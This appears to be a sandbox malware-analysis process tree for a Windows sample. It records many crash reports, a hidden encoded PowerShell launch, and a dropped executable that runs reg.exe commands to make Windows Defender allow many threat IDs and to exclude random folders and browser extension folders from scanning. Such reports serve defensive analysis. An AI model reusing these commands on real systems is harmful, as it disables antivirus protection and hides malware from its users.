C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 16924⤵
- Program crash
PID:4948
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 11684⤵
- Program crash
PID:5748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 13844⤵
- Program crash
PID:5272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 22124⤵
- Program crash
PID:5616
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4472 -ip 44721⤵PID:5924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4472 -ip 44721⤵PID:4000
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4472 -ip 44721⤵PID:5656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4472 -ip 44721⤵PID:3204
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4472 -ip 44721⤵PID:5408
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4472 -ip 44721⤵PID:416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4472 -ip 44721⤵PID:1708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4472 -ip 44721⤵PID:5624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4472 -ip 44721⤵PID:4152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4472 -ip 44721⤵PID:680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4472 -ip 44721⤵PID:316
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4472 -ip 44721⤵PID:4884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4472 -ip 44721⤵PID:6124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4472 -ip 44721⤵PID:2588
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4472 -ip 44721⤵PID:3788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4472 -ip 44721⤵PID:2168
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4472 -ip 44721⤵PID:2840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4472 -ip 44721⤵PID:5252
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4472 -ip 44721⤵PID:2416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4472 -ip 44721⤵PID:3208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4472 -ip 44721⤵PID:3264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4472 -ip 44721⤵PID:6024
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4752
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4472 -ip 44721⤵PID:4688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4472 -ip 44721⤵PID:2904
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4472 -ip 44721⤵PID:548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4472 -ip 44721⤵PID:4116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4472 -ip 44721⤵PID:5652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4472 -ip 44721⤵PID:1196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4472 -ip 44721⤵PID:5188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4472 -ip 44721⤵PID:5280
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4472 -ip 44721⤵PID:836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4472 -ip 44721⤵PID:3652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4472 -ip 44721⤵PID:4240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4472 -ip 44721⤵PID:4612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4472 -ip 44721⤵PID:1408
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4472 -ip 44721⤵PID:4812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4472 -ip 44721⤵PID:3336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4888 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:732
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4472 -ip 44721⤵PID:6136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1228
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam2⤵PID:5112
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam2⤵PID:3164
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4472 -ip 44721⤵PID:3716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4472 -ip 44721⤵PID:636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4472 -ip 44721⤵PID:5192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4472 -ip 44721⤵PID:4196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4472 -ip 44721⤵PID:3352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4472 -ip 44721⤵PID:2296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4472 -ip 44721⤵PID:1236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4472 -ip 44721⤵PID:860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4472 -ip 44721⤵PID:4988
-
C:\Users\Admin\AppData\Local\Temp\rHhrHuvAdxPPAxZoz\aGWnaFYBltXWMTT\lLqrbhs.exeC:\Users\Admin\AppData\Local\Temp\rHhrHuvAdxPPAxZoz\aGWnaFYBltXWMTT\lLqrbhs.exe Ut /iFsite_idTZi 757674 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2868 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:5592
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5732
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:6052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:5612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:5004
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BcAiYiAGnYnU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BcAiYiAGnYnU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FSlibiqhU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FSlibiqhU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VOWOsgMNhCULC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VOWOsgMNhCULC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mjOSdaDNjoUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mjOSdaDNjoUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sqlNiOiyVkxxalmKguR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sqlNiOiyVkxxalmKguR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hQVnVSXPSXnpeZVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hQVnVSXPSXnpeZVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rHhrHuvAdxPPAxZoz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rHhrHuvAdxPPAxZoz\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RBBsLnVCzcchQejz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RBBsLnVCzcchQejz\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcAiYiAGnYnU2" /t REG_DWORD /d 0 /reg:323⤵PID:2336
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcAiYiAGnYnU2" /t REG_DWORD /d 0 /reg:324⤵PID:1468
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcAiYiAGnYnU2" /t REG_DWORD /d 0 /reg:643⤵PID:804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FSlibiqhU" /t REG_DWORD /d 0 /reg:323⤵PID:5616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FSlibiqhU" /t REG_DWORD /d 0 /reg:643⤵PID:732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VOWOsgMNhCULC" /t REG_DWORD /d 0 /reg:323⤵PID:1544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VOWOsgMNhCULC" /t REG_DWORD /d 0 /reg:643⤵PID:2180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mjOSdaDNjoUn" /t REG_DWORD /d 0 /reg:323⤵PID:3912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mjOSdaDNjoUn" /t REG_DWORD /d 0 /reg:643⤵PID:3152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sqlNiOiyVkxxalmKguR" /t REG_DWORD /d 0 /reg:323⤵PID:5020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sqlNiOiyVkxxalmKguR" /t REG_DWORD /d 0 /reg:643⤵PID:3488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hQVnVSXPSXnpeZVB /t REG_DWORD /d 0 /reg:323⤵PID:772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hQVnVSXPSXnpeZVB /t REG_DWORD /d 0 /reg:643⤵PID:5684
-
-
